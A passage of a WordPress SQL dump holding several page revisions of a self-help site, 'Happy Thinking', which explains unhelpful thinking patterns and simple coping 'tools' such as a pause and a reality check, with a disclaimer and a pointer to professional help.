wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy to understand way, common types of unhelpful thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change unhelpful thinking or help prevent such thinking from affecting you in a negative way. I like to think of such techniques, as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with unhelpful thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing unhelpful thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising unhelpful thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-05-30 17:25:02', '2023-05-30 17:25:02', '', 1034, 'https://www.happythinking.com/?p=1613', 0, 'revision', '', 0),
(1590, 1, '2023-05-30 15:28:52', '2023-05-30 15:28:52', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œhappy thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were â€œhelpfulâ€ as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was â€œunhelpfulâ€ and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise unhelpful thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy to understand way, common types of unhelpful thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change unhelpful thinking or help prevent such thinking from affecting you in a negative way. I like to think of such techniques, as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with unhelpful thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing unhelpful thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising unhelpful thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click below to continue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Back</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/about_me/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","orientation":"horizontal","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button -->\n<div class="wp-block-button"><a class="wp-block-button__link wp-element-button">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-05-30 15:28:52', '2023-05-30 15:28:52', '', 1034, 'https://www.happythinking.com/?p=1590', 0, 'revision', '', 0),
(1496, 1, '2023-08-08 15:21:43', '2023-04-10 10:08:23', '', 'Unhelpful thinking', '', 'publish', 'closed', 'closed', '', 'types-of-stupid-thinking', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/2023/04/10/types-of-stupid-thinking/', 2, 'nav_menu_item', '', 0),
(1944, 1, '2023-06-21 17:16:37', '2023-06-21 17:16:37', '<!-- wp:paragraph -->\n<p>Happy thinking is about dealing with negative thinking patterns using â€œtoolsâ€. However, the tools one uses to deal with oneâ€™s mind are obviously not real metal tools like what a mechanic might use! One cannot open up oneâ€™s skull to work on oneâ€™s mind (please do not try!). Luckily a more practical option is however available to all of us, and that is to use oneâ€™s inner voice to â€œtalkâ€ to oneâ€™s mind. This is not as strange as you may imagine. Everyone has an inner voice, which in some can be quite obvious whereas in others it may stay mostly in the background. One may â€œhearâ€ oneâ€™s inner voice when one reads. Perhaps you can hear your inner voice right now as you read this very sentence!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Many tools in happy thinking will make use of oneâ€™s inner voice to deal with thoughts. Itâ€™s sort of like talking to oneself, but doing so inside oneâ€™s mind rather than speaking words out loud. Oneâ€™s inner voice, even though silent to those around oneself, is actually a very powerful force to deal with negative thinking patterns. In some sense, a lot of unhappiness is due to people not talking to themselves! One may talk to hundreds of people, and yet forget to talk to oneself.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/psychological-tools/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Inner voice', '', 'inherit', 'closed', 'closed', '', '1646-revision-v1', '', '', '2023-06-21 17:16:37', '2023-06-21 17:16:37', '', 1646, 'https://www.happythinking.com/?p=1944', 0, 'revision', '', 0),
(1945, 1, '2023-06-21 17:18:11', '2023-06-21 17:18:11', '<!-- wp:paragraph -->\n<p>As you know by now, the main aim of happy thinking is to help one deal with negative thinking patterns. A common feature of negative thinking patterns is that often they are negative because they distort reality. That is, such thoughts are based more on what one â€œimaginesâ€ the truth to be rather than what the truth actually is.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For a moment, letâ€™s assume that you are a judge in a court of law and that there is a person in front of you who has been accused of stealing a cake (I suppose it''s not the most serious of crimes, but this is only an example!). Now as a good and professional judge, it would be crazy for you to tell the accused, â€œHey, I â€˜imagineâ€™ that you must have stolen that cake, and therefore I declare that you are guilty.â€ There would be an uproar in the court because one needs to judge someone based on evidence rather than mere imagination. Unfortunately, oneâ€™s mind can often rely on imagination rather than facts, and this can cause one to have a lot of unnecessary distress. People often make the mistake of assuming that their thoughts accurately represent reality, when actually, they often may not. This is where a tool which I call the â€œreality check toolâ€, can be very useful. With this tool, after using the pause tool to â€œpauseâ€ the negative thought, one asks oneâ€™s mind, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ Let us continue with our example from the previous section, where Jayâ€™s partner was only ten minutes late returning home from work and he was having the negative thought, â€œShe must have met with a terrible road traffic accidentâ€. Jay first uses the â€œpause toolâ€ where he uses his internal voice and says â€œpauseâ€ to himself.&nbsp; He then applies the reality check tool to the paused thought, and asks himself, â€œWhat actual evidence do I have that supports my thought that my partner has had a terrible road traffic accident?â€. As Jay looks for evidence, he realises that he actually does not have any evidence that his partner has met with a road traffic accident. There are no phone calls or messages, no news reports, etc at this point to indicate that something awful has happened. Rather, he realises that he has â€œimaginedâ€ a thought with the worst outcome rather than having an evidence-based thought. With this realisation, Jayâ€™s negative thought dies away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is not to say that Jayâ€™s thought was utterly unrealistic as after all road traffic accidents do happen. Rather, the issue is that Jayâ€™s imagination was assuming the worst before there was actual evidence to support that view. The imagined negative thought would have caused him to have unnecessary worry and possibly even panic, before being at all certain that such worry was warranted. In fact, to highlight this, letâ€™s make our example have a happy ending. Soon after Jay uses the reality check tool, his partner walks through the door five minutes later, saying, â€œGosh there was so much traffic on the roads today!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the reality check tool, one must take care to only look for genuine evidence that could justify the negative thought and avoid the temptation to â€œimagineâ€ evidence (i.e. fake evidence!). This can happen if oneâ€™s mind is desperate to prove that the negative thought is true. When using the reality check tool, it would of course be useless to compare imaginary evidence Vs imagination!&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in summary, the reality check tool is about asking, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ One will find that with negative thoughts, there will be little or no evidence to support it. Once one realises that, the negative thought should fade away.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/ignore-move-on-tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Reality check tool', '', 'inherit', 'closed', 'closed', '', '1655-revision-v1', '', '', '2023-06-21 17:18:11', '2023-06-21 17:18:11', '', 1655, 'https://www.happythinking.com/?p=1945', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1943, 1, '2023-06-21 16:15:27', '2023-06-21 16:15:27', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>You can contact me via this email:  web21@freshgasflow.com     Please mention "Happy Thinking" in the subject line. Thank you. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Before we proceed, it is important that you get to know a bit about who I am (and who I am not!). Your mind is very precious and I would like you to know something about me before you trust me.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I must emphasise to you that I am not a mental health professional and I do not have formal qualifications in the subject. So, please take the information on this website at your own risk (please read the disclaimer section of this website for more details).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Now you may ask, â€œWhat qualifies me to run this website?â€ Well, perhaps like yourself, I too have been pondering about how to be happy. In my life, I have faced various challenges that have kept my mind often in an unhappy state. Over the years, I have thought about this issue and wondered if I could come up with a practical and easy to understand way of dealing with it.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I soon realised that the way oneâ€™s mind â€œthinksâ€, can play an important role if one is happy or not. When faced with challenges, I noticed that there seemed to be certain unhelpful ways of thinking that my mind did that caused me to be unhappy. I then thought that maybe an idea would be to deal with the issue like an engineer would deal with a faulty machine: i.e. recognise unhelpful ways of thinking and use tools to fix such thinking. So over the years, I learnt about the various unhelpful ways of thinking that oneâ€™s mind may do and then researched and experimented with various mental techniques (i.e. tools) that I could use to deal with such thinking. Having benefited from these techniques greatly, I felt that I should share such insights with others. I, therefore, made this website to fulfil this desire of sharing, with the hope that it will benefit many.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When reading the many â€œself helpâ€ books and other resources out there, I often found them to be either too vague or too complex to be of practical value in my day to life. In view of this, my number one focus for this website was to make it easy to understand and give solutions that one can realistically use in oneâ€™s daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I also would like to stress that it is very important that if you are being cared for by a mental health professional, under no circumstances should you change your thinking or medication, without their approval. They are trained individuals unlike me, and also, suddenly changing medication can be very dangerous. On the other hand, please do share this website with them and please let me know what they think of it! Also, unfortunately, suicide is a very real risk in some and if you feel in any way inclined to do so, please contact professional helplines in your country and also seek out friends and family. Things may feel very low, but once someone lifts you up a bit, you will realise that there is hope.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So while I would like to make it clear that this website does not provide professional advice, I hope that you will assess the simple ideas I will present to you and if you find them sensible, use them in your life to make yourself a happier person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I have kept this website free so that everyone can benefit. However, if you are able to make a small donation equal to about a dollar, I would be very grateful if you would do so by clicking on the donate tab at the top of the screen. You can click on the donate tab from any page.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim is for you to be happy and I am confident that the material on this website will help you to think in ways that will make you happy (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'About me', '', 'inherit', 'closed', 'closed', '', '466-revision-v1', '', '', '2023-06-21 16:15:27', '2023-06-21 16:15:27', '', 466, 'https://www.happythinking.com/?p=1943', 0, 'revision', '', 0),
(1772, 1, '2023-06-08 05:06:48', '2023-06-08 05:06:48', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1771,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/blueproblems_080623.jpg" alt="" class="wp-image-1771"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common types of negative thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change negative thinking or help prevent such thinking from affecting you in an adverse way. I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising negative thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-08 05:06:48', '2023-06-08 05:06:48', '', 1034, 'https://www.happythinking.com/?p=1772', 0, 'revision', '', 0),
(1587, 1, '2023-05-30 15:03:31', '2023-05-30 15:03:31', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"align":"center","id":1578,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking300523.jpg" alt="" class="wp-image-1578"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1581,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappyspiral300523.jpg" alt="" class="wp-image-1581"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On this website, I will describe to you, in an easy to understand way, various types of unhelpful thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to prevent such thinking from affecting you in a negative way. In essence, Happy Thinking is about not letting unhelpful ways of thinking get in the way of your happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1584,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/green_angel300523.jpg" alt="" class="wp-image-1584"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change unhelpful ways of thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-05-30 15:03:31', '2023-05-30 15:03:31', '', 88, 'https://www.happythinking.com/?p=1587', 0, 'revision', '', 0),
